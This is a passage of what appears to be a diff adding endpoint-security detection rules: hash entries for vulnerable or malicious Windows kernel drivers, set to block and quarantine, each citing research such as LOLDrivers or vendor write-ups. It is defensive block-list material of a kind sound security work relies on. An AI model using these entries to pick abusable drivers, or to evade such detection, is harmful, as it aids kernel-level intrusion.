+ "value": "284287b99fc92f7700c23bfcb78eb61d3101bd0767989e973d03e42bb67a660a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c63b841-f1bf-556a-9fb9-5c4612094386",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483784Z",
+ "creation_date": "2026-03-23T11:45:31.483788Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483798Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d11c772a4b7ee2748f1da5ddab4960ae5751b4b4624399cda777af923ccfbbc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c655c7c-67f9-5c50-b40f-5c47c5b12fa2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978650Z",
+ "creation_date": "2026-03-23T11:45:29.978652Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978658Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "911e01544557544de4ad59b374f1234513821c50a00c7afa62a8fcca07385b2f",
+ "comment": "Vulnerable Kernel Driver (aka magdrvamd64.sys) [https://www.loldrivers.io/drivers/cfd36b2e-cf96-498e-aeb6-ee20e7b33bbb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c6f59b4-ac34-5c2a-895b-c15b51c12200",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826049Z",
+ "creation_date": "2026-03-23T11:45:30.826052Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826061Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c764301c3ff5279d06ffd3b6a3180c9da38c3ae49d7eff8601835dabc8a9db99",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c7efbca-a654-5c16-b872-c587fd4317ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612793Z",
+ "creation_date": "2026-03-23T11:45:29.612795Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612800Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5e4dc1a918e201ec2cf02a036e4dd03dd04dfd179091c8adfbc6745eb830f2f",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c8af134-24cc-5972-97f1-717aea407f34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810433Z",
+ "creation_date": "2026-03-23T11:45:31.810435Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810440Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2be2c63aa1b437982d5ccede27644702a7edd189e3c498051030c6a7ace15a0b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c8ef31b-a90b-5290-8142-65f2c37577b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821467Z",
+ "creation_date": "2026-03-23T11:45:31.821469Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821475Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1582c2e29c20e43e3640f2054de2d06afdcb89524bf467b78a4a0ae747ccb9e9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c9cdade-2732-55f2-ade1-274c20eb316d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823695Z",
+ "creation_date": "2026-03-23T11:45:31.823697Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823703Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9efab0c988bf7577596ad8ef753ab784a46c44455e7b9395e10622d3e9a80b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ca7ba84-f9f5-5e03-8177-b2b5174007c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985720Z",
+ "creation_date": "2026-03-23T11:45:29.985722Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985728Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ac6d632f61d9abe287616ade35f555cd8cf5b91adda382c5ced0cbae468b0e7",
+ "comment": "Malicious Kernel Driver related to WINTAPIX (aka WinTapix.sys and SRVNET2.SYS) [https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1cab13d6-3a8e-5c07-9db0-8ab8f167e094",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975148Z",
+ "creation_date": "2026-03-23T11:45:29.975150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975156Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af1011c76a22af7be97a0b3e0ce11aca0509820c59fa7c8eeaaa1b2c0225f75a",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1cc84bcf-b33f-5132-ab81-9c9a8d799815",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831882Z",
+ "creation_date": "2026-03-23T11:45:30.831884Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831890Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8120ccba85fa029f3ad4a6498a573aa8ceb3bbde691a41da550ef87ba57f0d14",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ccb5a5b-d54e-52e3-9a08-211f88fbd137",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816291Z",
+ "creation_date": "2026-03-23T11:45:31.816294Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b36f5995cda260348a3c01015e681432e1e363b2c15a42a8cedc9cc26a143b1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1cd329c7-49c1-5afb-b642-cc31e32e7701",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479277Z",
+ "creation_date": "2026-03-23T11:45:30.479280Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479285Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cfa28e2f624f927d4cbd2952306570d86901d2f24e3d07cc6277e98289d09783",
+ "comment": "Vulnerable Kernel Driver (aka VBoxTAP.sys) [https://www.loldrivers.io/drivers/f22e7230-5f32-4c4e-bc9d-9076ebf10baa/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1cdd33b6-22b1-5f32-be69-fad90ac6154b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487272Z",
+ "creation_date": "2026-03-23T11:45:31.487274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "679ad546f6c631471cf2590db7f9fdde7b8df2d1883b673a1ab739f975238200",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ce2e860-bc84-593c-8249-77835115f9ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816508Z",
+ "creation_date": "2026-03-23T11:45:30.816510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816516Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e1f3b15e4e5003a563bf8742558f5dc48fd0fe20238efe759001bf226f234ff",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1cfdb981-6005-57ec-9f8f-d85825095c4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474741Z",
+ "creation_date": "2026-03-23T11:45:30.474744Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474753Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "158f9e2bcec73e821d5df17c1d5f9f46f23ecd9f6cf101588578235240f5cca0",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d087936-25d8-5891-8488-7bde0a489e4e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823502Z",
+ "creation_date": "2026-03-23T11:45:30.823504Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823509Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f36a82220bf47ed3a0fe4d33db7c9f22f1e9906930dad1609f15c8c74c1d402",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d108049-dedb-591e-be69-72fbaccf90ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475895Z",
+ "creation_date": "2026-03-23T11:45:30.475899Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475907Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c190e4a7f1781ec9fa8c17506b4745a1369dcdf174ce07f85de1a66cf4b5ed8a",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d1443ce-3788-5263-8bf5-0ec1e04a2f66",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481414Z",
+ "creation_date": "2026-03-23T11:45:30.481417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ec7af309a9359c332d300861655faeceb68bb1cd836dd66d10dd4fac9c01a28",
+ "comment": "Vulnerable Kernel Driver (aka phymem_ext64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d216cbb-342c-5b21-b9c5-b9f645a5a64f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833910Z",
+ "creation_date": "2026-03-23T11:45:30.833913Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833922Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "563684a67bba92fc286df805f6a1e8084ba49517ff904544885b06f149ea13ce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d231e1e-8909-5deb-82f0-05d99f7e20a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142772Z",
+ "creation_date": "2026-03-23T11:45:31.142774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142780Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b29023164d31da561b5c91c75f22377b9f0b8ded0b4b8b049a77e06b6a1ec24",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d26770e-b3fd-576e-b143-a2766abce929",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458635Z",
+ "creation_date": "2026-03-23T11:45:30.458639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458648Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf2ea0e4d21d3774bbacf10a14c75583b448829f87a90b869678fbc4de9b2a99",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1d3c2aff-ebf2-5472-bb52-97174bc86c15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976192Z",
+ "creation_date": "2026-03-23T11:45:29.976194Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976199Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4",
